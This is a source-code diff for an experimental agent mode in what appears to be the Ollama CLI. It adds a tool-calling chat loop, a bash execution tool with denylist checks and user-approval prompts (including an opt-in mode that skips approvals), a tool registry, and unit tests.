+			toolCalls := response.Message.ToolCalls
+			if len(toolCalls) > 0 {
+				if toolRegistry != nil {
+					// Store tool calls for execution after response is complete
+					pendingToolCalls = append(pendingToolCalls, toolCalls...)
+				} else {
+					// No tools registry, just display tool calls
+					fmt.Print(renderToolCalls(toolCalls, false))
+				}
+			}
+		}
+
+		displayResponse(content, opts.WordWrap, state)
+
+		return nil
+	}
+
+	if opts.Format == "json" {
+		opts.Format = `"` + opts.Format + `"`
+	}
+
+	// Agentic loop: continue until no more tool calls
+	for {
+		req := &api.ChatRequest{
+			Model:    opts.Model,
+			Messages: messages,
+			Format:   json.RawMessage(opts.Format),
+			Options:  opts.Options,
+			Think:    opts.Think,
+		}
+
+		// Add tools
+		if toolRegistry != nil {
+			apiTools := toolRegistry.Tools()
+			if len(apiTools) > 0 {
+				req.Tools = apiTools
+			}
+		}
+
+		if opts.KeepAlive != nil {
+			req.KeepAlive = opts.KeepAlive
+		}
+
+		if err := client.Chat(cancelCtx, req, fn); err != nil {
+			if errors.Is(err, context.Canceled) {
+				return nil, nil
+			}
+
+			// Check for 401 Unauthorized - prompt user to sign in
+			var authErr api.AuthorizationError
+			if errors.As(err, &authErr) {
+				p.StopAndClear()
+				fmt.Fprintf(os.Stderr, "\033[33mAuthentication required to use this cloud model.\033[0m\n")
+				result, promptErr := agent.PromptYesNo("Sign in to Ollama?")
+				if promptErr == nil && result {
+					if signinErr := waitForOllamaSignin(ctx); signinErr == nil {
+						// Retry the chat request
+						fmt.Fprintf(os.Stderr, "\033[90mRetrying...\033[0m\n")
+						continue // Retry the loop
+					}
+				}
+				return nil, fmt.Errorf("authentication required - run 'ollama signin' to authenticate")
+			}
+
+			// Check for 500 errors (often tool parsing failures) - inform the model
+			var statusErr api.StatusError
+			if errors.As(err, &statusErr) && statusErr.StatusCode >= 500 {
+				consecutiveErrors++
+				p.StopAndClear()
+
+				if consecutiveErrors >= 3 {
+					fmt.Fprintf(os.Stderr, "\033[31m✗ Too many consecutive errors, giving up\033[0m\n")
+					return nil, fmt.Errorf("too many consecutive server errors: %s", statusErr.ErrorMessage)
+				}
+
+				fmt.Fprintf(os.Stderr, "\033[33m⚠ Server error (attempt %d/3): %s\033[0m\n", consecutiveErrors, statusErr.ErrorMessage)
+
+				// Include both the model's response and the error so it can learn
+				assistantContent := fullResponse.String()
+				if assistantContent == "" {
+					assistantContent = "(empty response)"
+				}
+				errorMsg := fmt.Sprintf("Your previous response caused an error: %s\n\nYour response was:\n%s\n\nPlease try again with a valid response.", statusErr.ErrorMessage, assistantContent)
+				messages = append(messages,
+					api.Message{Role: "user", Content: errorMsg},
+				)
+
+				// Reset state and retry
+				fullResponse.Reset()
+				thinkingContent.Reset()
+				thinkTagOpened = false
+				thinkTagClosed = false
+				pendingToolCalls = nil
+				state = &displayResponseState{}
+				p = progress.NewProgress(os.Stderr)
+				spinner = progress.NewSpinner("")
+				p.Add("", spinner)
+				continue
+			}
+
+			if strings.Contains(err.Error(), "upstream error") {
+				p.StopAndClear()
+				fmt.Println("An error occurred while processing your message. Please try again.")
+				fmt.Println()
+				return nil, nil
+			}
+			return nil, err
+		}
+
+		// Reset consecutive error counter on success
+		consecutiveErrors = 0
+
+		// If no tool calls, we're done
+		if len(pendingToolCalls) == 0 || toolRegistry == nil {
+			break
+		}
+
+		// Execute tool calls and continue the conversation
+		fmt.Fprintf(os.Stderr, "\n")
+
+		// Add assistant's tool call message to history
+		assistantMsg := api.Message{
+			Role:      "assistant",
+			Content:   fullResponse.String(),
+			Thinking:  thinkingContent.String(),
+			ToolCalls: pendingToolCalls,
+		}
+		messages = append(messages, assistantMsg)
+
+		// Execute each tool call and collect results
+		var toolResults []api.Message
+		for _, call := range pendingToolCalls {
+			toolName := call.Function.Name
+			args := call.Function.Arguments.ToMap()
+
+			// For bash commands, check denylist first
+			skipApproval := false
+			if toolName == "bash" {
+				if cmd, ok := args["command"].(string); ok {
+					// Check if command is denied (dangerous pattern)
+					if denied, pattern := agent.IsDenied(cmd); denied {
+						fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
+						fmt.Fprintf(os.Stderr, "\033[91m  Matches dangerous pattern: %s\033[0m\n", pattern)
+						toolResults = append(toolResults, api.Message{
+							Role:       "tool",
+							Content:    agent.FormatDeniedResult(cmd, pattern),
+							ToolCallID: call.ID,
+						})
+						continue
+					}
+
+					// Check if command is auto-allowed (safe command)
+					if agent.IsAutoAllowed(cmd) {
+						fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
+						skipApproval = true
+					}
+				}
+			}
+
+			// Check approval (uses prefix matching for bash commands)
+			// In yolo mode, skip all approval prompts
+			if opts.YoloMode {
+				if !skipApproval {
+					fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
+				}
+			} else if !skipApproval && !approval.IsAllowed(toolName, args) {
+				result, err := approval.RequestApproval(toolName, args)
+				if err != nil {
+					fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
+					toolResults = append(toolResults, api.Message{
+						Role:       "tool",
+						Content:    fmt.Sprintf("Error: %v", err),
+						ToolCallID: call.ID,
+					})
+					continue
+				}
+
+				// Show collapsed result
+				fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
+
+				switch result.Decision {
+				case agent.ApprovalDeny:
+					toolResults = append(toolResults, api.Message{
+						Role:       "tool",
+						Content:    agent.FormatDenyResult(toolName, result.DenyReason),
+						ToolCallID: call.ID,
+					})
+					continue
+				case agent.ApprovalAlways:
+					approval.AddToAllowlist(toolName, args)
+				}
+			} else if !skipApproval {
+				// Already allowed - show running indicator
+				fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
+			}
+
+			// Execute the tool
+			toolResult, err := toolRegistry.Execute(call)
+			if err != nil {
+				// Check if web search needs authentication
+				if errors.Is(err, tools.ErrWebSearchAuthRequired) {
+					// Prompt user to sign in
+					fmt.Fprintf(os.Stderr, "\033[33m  Web search requires authentication.\033[0m\n")
+					result, promptErr := agent.PromptYesNo("Sign in to Ollama?")
+					if promptErr == nil && result {
+						// Get signin URL and wait for auth completion
+						if signinErr := waitForOllamaSignin(ctx); signinErr == nil {
+							// Retry the web search
+							fmt.Fprintf(os.Stderr, "\033[90m  Retrying web search...\033[0m\n")
+							toolResult, err = toolRegistry.Execute(call)
+							if err == nil {
+								goto toolSuccess
+							}
+						}
+					}
+				}
+				fmt.Fprintf(os.Stderr, "\033[31m  Error: %v\033[0m\n", err)
+				toolResults = append(toolResults, api.Message{
+					Role:       "tool",
+					Content:    fmt.Sprintf("Error: %v", err),
+					ToolCallID: call.ID,
+				})
+				continue
+			}
+		toolSuccess:
+
+			// Display tool output (truncated for display)
+			truncatedOutput := ""
+			if toolResult != "" {
+				output := toolResult
+				if len(output) > 300 {
+					output = output[:300] + "... (truncated, press Ctrl+O to expand)"
+				}
+				truncatedOutput = output
+				// Show result in grey, indented
+				fmt.Fprintf(os.Stderr, "\033[90m  %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n  "))
+			}
+
+			// Store full and truncated output for Ctrl+O toggle
+			if opts.LastToolOutput != nil {
+				*opts.LastToolOutput = toolResult
+			}
+			if opts.LastToolOutputTruncated != nil {
+				*opts.LastToolOutputTruncated = truncatedOutput
+			}
+
+			// Truncate output to prevent context overflow
+			toolResultForLLM := truncateToolOutput(toolResult, opts.Model)
+
+			toolResults = append(toolResults, api.Message{
+				Role:       "tool",
+				Content:    toolResultForLLM,
+				ToolCallID: call.ID,
+			})
+		}
+
+		// Add tool results to message history
+		messages = append(messages, toolResults...)
+
+		fmt.Fprintf(os.Stderr, "\n")
+
+		// Reset state for next iteration
+		fullResponse.Reset()
+		thinkingContent.Reset()
+		thinkTagOpened = false
+		thinkTagClosed = false
+		pendingToolCalls = nil
+		state = &displayResponseState{}
+
+		// Start new progress spinner for next API call
+		p = progress.NewProgress(os.Stderr)
+		spinner = progress.NewSpinner("")
+		p.Add("", spinner)
+	}
+
+	if len(opts.Messages) > 0 {
+		fmt.Println()
+		fmt.Println()
+	}
+
+	return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
+}
+
+// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
+func truncateUTF8(s string, limit int) string {
+	runes := []rune(s)
+	if len(runes) <= limit {
+		return s
+	}
+	if limit <= 3 {
+		return string(runes[:limit])
+	}
+	return string(runes[:limit-3]) + "..."
+}
+
+// formatToolShort returns a short description of a tool call.
+func formatToolShort(toolName string, args map[string]any) string {
+	if toolName == "bash" {
+		if cmd, ok := args["command"].(string); ok {
+			return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
+		}
+	}
+	if toolName == "web_search" {
+		if query, ok := args["query"].(string); ok {
+			return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
+		}
+	}
+	return toolName
+}
+
+// Helper types and functions for display
+
+type displayResponseState struct {
+	lineLength int
+	wordBuffer string
+}
+
+func displayResponse(content string, wordWrap bool, state *displayResponseState) {
+	termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
+	if wordWrap && termWidth >= 10 {
+		for _, ch := range content {
+			if state.lineLength+1 > termWidth-5 {
+				if len(state.wordBuffer) > termWidth-10 {
+					fmt.Printf("%s%c", state.wordBuffer, ch)
+					state.wordBuffer = ""
+					state.lineLength = 0
+					continue
+				}
+
+				// backtrack the length of the last word and clear to the end of the line
+				a := len(state.wordBuffer)
+				if a > 0 {
+					fmt.Printf("\x1b[%dD", a)
+				}
+				fmt.Printf("\x1b[K\n")
+				fmt.Printf("%s%c", state.wordBuffer, ch)
+
+				state.lineLength = len(state.wordBuffer) + 1
+			} else {
+				fmt.Print(string(ch))
+				state.lineLength++
+
+				switch ch {
+				case ' ', '\t':
+					state.wordBuffer = ""
+				case '\n', '\r':
+					state.lineLength = 0
+					state.wordBuffer = ""
+				default:
+					state.wordBuffer += string(ch)
+				}
+			}
+		}
+	} else {
+		fmt.Printf("%s%s", state.wordBuffer, content)
+		if len(state.wordBuffer) > 0 {
+			state.wordBuffer = ""
+		}
+	}
+}
+
+func thinkingOutputOpeningText(plainText bool) string {
+	text := "Thinking...\n"
+
+	if plainText {
+		return text
+	}
+
+	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
+}
+
+func thinkingOutputClosingText(plainText bool) string {
+	text := "...done thinking.\n\n"
+
+	if plainText {
+		return text
+	}
+
+	return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
+}
+
+func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
+	out := ""
+	formatExplanation := ""
+	formatValues := ""
+	if !plainText {
+		formatExplanation = readline.ColorGrey + readline.ColorBold
+		formatValues = readline.ColorDefault
+		out += formatExplanation
+	}
+	for i, toolCall := range toolCalls {
+		argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
+		if err != nil {
+			return ""
+		}
+		if i > 0 {
+			out += "\n"
+		}
+		out += fmt.Sprintf("  Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
+	}
+	if !plainText {
+		out += readline.ColorDefault
+	}
+	return out
+}
+
+// checkModelCapabilities checks if the model supports tools.
+func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
+	client, err := api.ClientFromEnvironment()
+	if err != nil {
+		return false, err
+	}
+
+	resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
+	if err != nil {
+		return false, err
+	}
+
+	for _, cap := range resp.Capabilities {
+		if cap == model.CapabilityTools {
+			return true, nil
+		}
+	}
+
+	return false, nil
+}
+
+// GenerateInteractive runs an interactive agent session.
+// This is called from cmd.go when --experimental flag is set.
+// If yoloMode is true, all tool approvals are skipped.
+func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration, yoloMode bool) error {
+	scanner, err := readline.New(readline.Prompt{
+		Prompt:         ">>> ",
+		AltPrompt:      "... ",
+		Placeholder:    "Send a message (/? for help)",
+		AltPlaceholder: `Use """ to end multi-line input`,
+	})
+	if err != nil {
+		return err
+	}
+
+	fmt.Print(readline.StartBracketedPaste)
+	defer fmt.Printf(readline.EndBracketedPaste)
+
+	// Check if model supports tools
+	supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
+		supportsTools = false
+	}
+
+	// Create tool registry only if model supports tools
+	var toolRegistry *tools.Registry
+	if supportsTools {
+		toolRegistry = tools.DefaultRegistry()
+		if toolRegistry.Count() > 0 {
+			fmt.Fprintf(os.Stderr, "\033[90mTools available: %s\033[0m\n", strings.Join(toolRegistry.Names(), ", "))
+		}
+		if yoloMode {
+			fmt.Fprintf(os.Stderr, "\033[33m⚠ YOLO mode: All tool approvals will be skipped\033[0m\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
+	}
+
+	// Create approval manager for session
+	approval := agent.NewApprovalManager()
+
+	var messages []api.Message
+	var sb strings.Builder
+
+	// Track last tool output for Ctrl+O toggle
+	var lastToolOutput string
+	var lastToolOutputTruncated string
+	var toolOutputExpanded bool
+
+	for {
+		line, err := scanner.Readline()
+		switch {
+		case errors.Is(err, io.EOF):
+			fmt.Println()
+			return nil
+		case errors.Is(err, readline.ErrInterrupt):
+			if line == "" {
+				fmt.Println("\nUse Ctrl + d or /bye to exit.")
+			}
+			sb.Reset()
+			continue
+		case errors.Is(err, readline.ErrExpandOutput):
+			// Ctrl+O pressed - toggle between expanded and collapsed tool output
+			if lastToolOutput == "" {
+				fmt.Fprintf(os.Stderr, "\033[90mNo tool output to expand\033[0m\n")
+			} else if toolOutputExpanded {
+				// Currently expanded, show truncated
+				fmt.Fprintf(os.Stderr, "\033[90m  %s\033[0m\n", strings.ReplaceAll(lastToolOutputTruncated, "\n", "\n  "))
+				toolOutputExpanded = false
+			} else {
+				// Currently collapsed, show full
+				fmt.Fprintf(os.Stderr, "\033[90m  %s\033[0m\n", strings.ReplaceAll(lastToolOutput, "\n", "\n  "))
+				toolOutputExpanded = true
+			}
+			continue
+		case err != nil:
+			return err
+		}
+
+		switch {
+		case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
+			return nil
+		case strings.HasPrefix(line, "/clear"):
+			messages = []api.Message{}
+			approval.Reset()
+			fmt.Println("Cleared session context and tool approvals")
+			continue
+		case strings.HasPrefix(line, "/tools"):
+			showToolsStatus(toolRegistry, approval, supportsTools)
+			continue
+		case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
+			fmt.Fprintln(os.Stderr, "Available Commands:")
+			fmt.Fprintln(os.Stderr, "  /tools          Show available tools and approvals")
+			fmt.Fprintln(os.Stderr, "  /clear          Clear session context and approvals")
+			fmt.Fprintln(os.Stderr, "  /bye            Exit")
+			fmt.Fprintln(os.Stderr, "  /?, /help       Help for a command")
+			fmt.Fprintln(os.Stderr, "")
+			fmt.Fprintln(os.Stderr, "Keyboard Shortcuts:")
+			fmt.Fprintln(os.Stderr, "  Ctrl+O          Expand last tool output")
+			fmt.Fprintln(os.Stderr, "")
+			continue
+		case strings.HasPrefix(line, "/"):
+			fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
+			continue
+		default:
+			sb.WriteString(line)
+		}
+
+		if sb.Len() > 0 {
+			newMessage := api.Message{Role: "user", Content: sb.String()}
+			messages = append(messages, newMessage)
+
+			opts := RunOptions{
+				Model:                   modelName,
+				Messages:                messages,
+				WordWrap:                wordWrap,
+				Options:                 options,
+				Think:                   think,
+				HideThinking:            hideThinking,
+				KeepAlive:               keepAlive,
+				Tools:                   toolRegistry,
+				Approval:                approval,
+				YoloMode:                yoloMode,
+				LastToolOutput:          &lastToolOutput,
+				LastToolOutputTruncated: &lastToolOutputTruncated,
+			}
+			// Reset expanded state for new tool execution
+			toolOutputExpanded = false
+
+			assistant, err := Chat(cmd.Context(), opts)
+			if err != nil {
+				return err
+			}
+			if assistant != nil {
+				messages = append(messages, *assistant)
+			}
+
+			sb.Reset()
+		}
+	}
+}
+
+// showToolsStatus displays the current tools and approval status.
+func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
+	if !supportsTools || registry == nil {
+		fmt.Println("Tools not available - model does not support tool calling")
+		fmt.Println()
+		return
+	}
+
+	fmt.Println("Available tools:")
+	for _, name := range registry.Names() {
+		tool, _ := registry.Get(name)
+		fmt.Printf("  %s - %s\n", name, tool.Description())
+	}
+
+	allowed := approval.AllowedTools()
+	if len(allowed) > 0 {
+		fmt.Println("\nSession approvals:")
+		for _, key := range allowed {
+			fmt.Printf("  %s\n", key)
+		}
+	} else {
+		fmt.Println("\nNo tools approved for this session yet")
+	}
+	fmt.Println()
+}

x/cmd/run_test.go

@@ -0,0 +1,180 @@
+package cmd
+
+import (
+	"testing"
+)
+
+func TestIsLocalModel(t *testing.T) {
+	tests := []struct {
+		name      string
+		modelName string
+		expected  bool
+	}{
+		{
+			name:      "local model without suffix",
+			modelName: "llama3.2",
+			expected:  true,
+		},
+		{
+			name:      "local model with version",
+			modelName: "qwen2.5:7b",
+			expected:  true,
+		},
+		{
+			name:      "cloud model",
+			modelName: "gpt-4-cloud",
+			expected:  false,
+		},
+		{
+			name:      "cloud model with version",
+			modelName: "claude-3-cloud",
+			expected:  false,
+		},
+		{
+			name:      "empty model name",
+			modelName: "",
+			expected:  true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := isLocalModel(tt.modelName)
+			if result != tt.expected {
+				t.Errorf("isLocalModel(%q) = %v, expected %v", tt.modelName, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestIsLocalServer(t *testing.T) {
+	tests := []struct {
+		name     string
+		host     string
+		expected bool
+	}{
+		{
+			name:     "empty host (default)",
+			host:     "",
+			expected: true,
+		},
+		{
+			name:     "localhost",
+			host:     "http://localhost:11434",
+			expected: true,
+		},
+		{
+			name:     "127.0.0.1",
+			host:     "http://127.0.0.1:11434",
+			expected: true,
+		},
+		{
+			name:     "custom port on localhost",
+			host:     "http://localhost:8080",
+			expected: true, // localhost is always considered local
+		},
+		{
+			name:     "remote host",
+			host:     "http://ollama.example.com:11434",
+			expected: true, // has :11434
+		},
+		{
+			name:     "remote host different port",
+			host:     "http://ollama.example.com:8080",
+			expected: false,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Setenv("OLLAMA_HOST", tt.host)
+			result := isLocalServer()
+			if result != tt.expected {
+				t.Errorf("isLocalServer() with OLLAMA_HOST=%q = %v, expected %v", tt.host, result, tt.expected)
+			}
+		})
+	}
+}
+
+func TestTruncateToolOutput(t *testing.T) {
+	// Create outputs of different sizes
+	localLimitOutput := make([]byte, 20000)   // > 4k tokens (16k chars)
+	defaultLimitOutput := make([]byte, 50000) // > 10k tokens (40k chars)
+	for i := range localLimitOutput {
+		localLimitOutput[i] = 'a'
+	}
+	for i := range defaultLimitOutput {
+		defaultLimitOutput[i] = 'b'
+	}
+
+	tests := []struct {
+		name          string
+		output        string
+		modelName     string
+		host          string
+		shouldTrim    bool
+		expectedLimit int
+	}{
+		{
+			name:          "short output local model",
+			output:        "hello world",
+			modelName:     "llama3.2",
+			host:          "",
+			shouldTrim:    false,
+			expectedLimit: localModelTokenLimit,
+		},
+		{
+			name:          "long output local model - trimmed at 4k",
+			output:        string(localLimitOutput),
+			modelName:     "llama3.2",
+			host:          "",
+			shouldTrim:    true,
+			expectedLimit: localModelTokenLimit,
+		},
+		{
+			name:          "long output cloud model - uses 10k limit",
+			output:        string(localLimitOutput), // 20k chars, under 10k token limit
+			modelName:     "gpt-4-cloud",
+			host:          "",
+			shouldTrim:    false,
+			expectedLimit: defaultTokenLimit,
+		},
+		{
+			name:          "very long output cloud model - trimmed at 10k",
+			output:        string(defaultLimitOutput),
+			modelName:     "gpt-4-cloud",
+			host:          "",
+			shouldTrim:    true,
+			expectedLimit: defaultTokenLimit,
+		},
+		{
+			name:          "long output remote server - uses 10k limit",
+			output:        string(localLimitOutput),
+			modelName:     "llama3.2",
+			host:          "http://remote.example.com:8080",
+			shouldTrim:    false,
+			expectedLimit: defaultTokenLimit,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Setenv("OLLAMA_HOST", tt.host)
+			result := truncateToolOutput(tt.output, tt.modelName)
+
+			if tt.shouldTrim {
+				maxLen := tt.expectedLimit * charsPerToken
+				if len(result) > maxLen+50 { // +50 for the truncation message
+					t.Errorf("expected output to be truncated to ~%d chars, got %d", maxLen, len(result))
+				}
+				if result == tt.output {
+					t.Error("expected output to be truncated but it wasn't")
+				}
+			} else {
+				if result != tt.output {
+					t.Error("expected output to not be truncated")
+				}
+			}
+		})
+	}
+}

x/tools/bash.go

@@ -0,0 +1,114 @@
+package tools
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/ollama/ollama/api"
+)
+
+const (
+	// bashTimeout is the maximum execution time for a command.
+	bashTimeout = 60 * time.Second
+	// maxOutputSize is the maximum output size in bytes.
+	maxOutputSize = 50000
+)
+
+// BashTool implements shell command execution.
+type BashTool struct{}
+
+// Name returns the tool name.
+func (b *BashTool) Name() string {
+	return "bash"
+}
+
+// Description returns a description of the tool.
+func (b *BashTool) Description() string {
+	return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
+}
+
+// Schema returns the tool's parameter schema.
+func (b *BashTool) Schema() api.ToolFunction {
+	props := api.NewToolPropertiesMap()
+	props.Set("command", api.ToolProperty{
+		Type:        api.PropertyType{"string"},
+		Description: "The bash command to execute",
+	})
+	return api.ToolFunction{
+		Name:        b.Name(),
+		Description: b.Description(),
+		Parameters: api.ToolFunctionParameters{
+			Type:       "object",
+			Properties: props,
+			Required:   []string{"command"},
+		},
+	}
+}
+
+// Execute runs the bash command.
+func (b *BashTool) Execute(args map[string]any) (string, error) {
+	command, ok := args["command"].(string)
+	if !ok || command == "" {
+		return "", fmt.Errorf("command parameter is required")
+	}
+
+	// Create context with timeout
+	ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
+	defer cancel()
+
+	// Execute command
+	cmd := exec.CommandContext(ctx, "bash", "-c", command)
+
+	var stdout, stderr bytes.Buffer
+	cmd.Stdout = &stdout
+	cmd.Stderr = &stderr
+
+	err := cmd.Run()
+
+	// Build output
+	var sb strings.Builder
+
+	// Add stdout
+	if stdout.Len() > 0 {
+		output := stdout.String()
+		if len(output) > maxOutputSize {
+			output = output[:maxOutputSize] + "\n... (output truncated)"
+		}
+		sb.WriteString(output)
+	}
+
+	// Add stderr if present
+	if stderr.Len() > 0 {
+		stderrOutput := stderr.String()
+		if len(stderrOutput) > maxOutputSize {
+			stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
+		}
+		if sb.Len() > 0 {
+			sb.WriteString("\n")
+		}
+		sb.WriteString("stderr:\n")
+		sb.WriteString(stderrOutput)
+	}
+
+	// Handle errors
+	if err != nil {
+		if ctx.Err() == context.DeadlineExceeded {
+			return sb.String() + "\n\nError: command timed out after 60 seconds", nil
+		}
+		// Include exit code in output but don't return as error
+		if exitErr, ok := err.(*exec.ExitError); ok {
+			return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
+		}
+		return sb.String(), fmt.Errorf("executing command: %w", err)
+	}
+
+	if sb.Len() == 0 {
+		return "(no output)", nil
+	}
+
+	return sb.String(), nil
+}

x/tools/registry.go

@@ -0,0 +1,104 @@
+// Package tools provides built-in tool implementations for the agent loop.
+package tools
+
+import (
+	"fmt"
+	"os"
+	"sort"
+
+	"github.com/ollama/ollama/api"
+)
+
+// Tool defines the interface for agent tools.
+type Tool interface {
+	// Name returns the tool's unique identifier.
+	Name() string
+	// Description returns a human-readable description of what the tool does.
+	Description() string
+	// Schema returns the tool's parameter schema for the LLM.
+	Schema() api.ToolFunction
+	// Execute runs the tool with the given arguments.
+	Execute(args map[string]any) (string, error)
+}
+
+// Registry manages available tools.
+type Registry struct {
+	tools map[string]Tool
+}
+
+// NewRegistry creates a new tool registry.
+func NewRegistry() *Registry {
+	return &Registry{
+		tools: make(map[string]Tool),
+	}
+}
+
+// Register adds a tool to the registry.
+func (r *Registry) Register(tool Tool) {
+	r.tools[tool.Name()] = tool
+}
+
+// Get retrieves a tool by name.
+func (r *Registry) Get(name string) (Tool, bool) {
+	tool, ok := r.tools[name]
+	return tool, ok
+}
+
+// Tools returns all registered tools in Ollama API format, sorted by name.
+func (r *Registry) Tools() api.Tools {
+	// Get sorted names for deterministic ordering
+	names := make([]string, 0, len(r.tools))
+	for name := range r.tools {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+
+	var tools api.Tools
+	for _, name := range names {
+		tool := r.tools[name]
+		tools = append(tools, api.Tool{
+			Type:     "function",
+			Function: tool.Schema(),
+		})
+	}
+	return tools
+}
+
+// Execute runs a tool call and returns the result.
+func (r *Registry) Execute(call api.ToolCall) (string, error) {
+	tool, ok := r.tools[call.Function.Name]
+	if !ok {
+		return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
+	}
+	return tool.Execute(call.Function.Arguments.ToMap())
+}
+
+// Names returns the names of all registered tools, sorted alphabetically.
+func (r *Registry) Names() []string {
+	names := make([]string, 0, len(r.tools))
+	for name := range r.tools {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	return names
+}
+
+// Count returns the number of registered tools.
+func (r *Registry) Count() int {
+	return len(r.tools)
+}
+
+// DefaultRegistry creates a registry with all built-in tools.
+// Tools can be disabled via environment variables:
+// - OLLAMA_AGENT_DISABLE_WEBSEARCH=1 disables web_search
+// - OLLAMA_AGENT_DISABLE_BASH=1 disables bash
+func DefaultRegistry() *Registry {
+	r := NewRegistry()
+	if os.Getenv("OLLAMA_AGENT_DISABLE_WEBSEARCH") == "" {
+		r.Register(&WebSearchTool{})
+	}
+	if os.Getenv("OLLAMA_AGENT_DISABLE_BASH") == "" {
+		r.Register(&BashTool{})
+	}
+	return r
+}

x/tools/registry_test.go

@@ -0,0 +1,194 @@
+package tools
+
+import (
+	"testing"
+
+	"github.com/ollama/ollama/api"
+)
+
+func TestRegistry_Register(t *testing.T) {
+	r := NewRegistry()
+
+	r.Register(&BashTool{})
+	r.Register(&WebSearchTool{})
+
+	if r.Count() != 2 {
+		t.Errorf("expected 2 tools, got %d", r.Count())
+	}
+
+	names := r.Names()
+	if len(names) != 2 {
+		t.Errorf("expected 2 names, got %d", len(names))
+	}
+}
+
+func TestRegistry_Get(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+
+	tool, ok := r.Get("bash")
+	if !ok {
+		t.Fatal("expected to find bash tool")
+	}
+
+	if tool.Name() != "bash" {
+		t.Errorf("expected name 'bash', got '%s'", tool.Name())
+	}
+
+	_, ok = r.Get("nonexistent")
+	if ok {
+		t.Error("expected not to find nonexistent tool")
+	}
+}
+
+func TestRegistry_Tools(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+	r.Register(&WebSearchTool{})
+
+	tools := r.Tools()
+	if len(tools) != 2 {
+		t.Errorf("expected 2 tools, got %d", len(tools))
+	}
+
+	for _, tool := range tools {
+		if tool.Type != "function" {
+			t.Errorf("expected type 'function', got '%s'", tool.Type)
+		}
+	}
+}
+
+func TestRegistry_Execute(t *testing.T) {
+	r := NewRegistry()
+	r.Register(&BashTool{})
+
+	// Test successful execution
+	args := api.NewToolCallFunctionArguments()
+	args.Set("command", "echo hello")
+	result, err := r.Execute(api.ToolCall{
+		Function: api.ToolCallFunction{
+			Name:      "bash",
+			Arguments: args,
+		},
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if result != "hello\n" {
+		t.Errorf("expected 'hello\\n', got '%s'", result)
+	}
+
+	// Test unknown tool
+	_, err = r.Execute(api.ToolCall{
+		Function: api.ToolCallFunction{
+			Name:      "unknown",
+			Arguments: api.NewToolCallFunctionArguments(),
+		},
+	})
+	if err == nil {
+		t.Error("expected error for unknown tool")
+	}
+}
+
+func TestDefaultRegistry(t *testing.T) {
+	r := DefaultRegistry()
+
+	if r.Count() != 2 {
+		t.Errorf("expected 2 tools in default registry, got %d", r.Count())
+	}
+
+	_, ok := r.Get("bash")
+	if !ok {
+		t.Error("expected bash tool in default registry")
+	}
+
+	_, ok = r.Get("web_search")
+	if !ok {
+		t.Error("expected web_search tool in default registry")
+	}
+}
+
+func TestDefaultRegistry_DisableWebsearch(t *testing.T) {
+	t.Setenv("OLLAMA_AGENT_DISABLE_WEBSEARCH", "1")
+
+	r := DefaultRegistry()
+
+	if r.Count() != 1 {
+		t.Errorf("expected 1 tool with websearch disabled, got %d", r.Count())
+	}
+
+	_, ok := r.Get("bash")
+	if !ok {
+		t.Error("expected bash tool in registry")
+	}
+
+	_, ok = r.Get("web_search")
+	if ok {
+		t.Error("expected web_search to be disabled")
+	}
+}
+
+func TestDefaultRegistry_DisableBash(t *testing.T) {
+	t.Setenv("OLLAMA_AGENT_DISABLE_BASH", "1")
+
+	r := DefaultRegistry()
+
+	if r.Count() != 1 {
+		t.Errorf("expected 1 tool with bash disabled, got %d", r.Count())
+	}
+
+	_, ok := r.Get("web_search")
+	if !ok {
+		t.Error("expected web_search tool in registry")
+	}
+
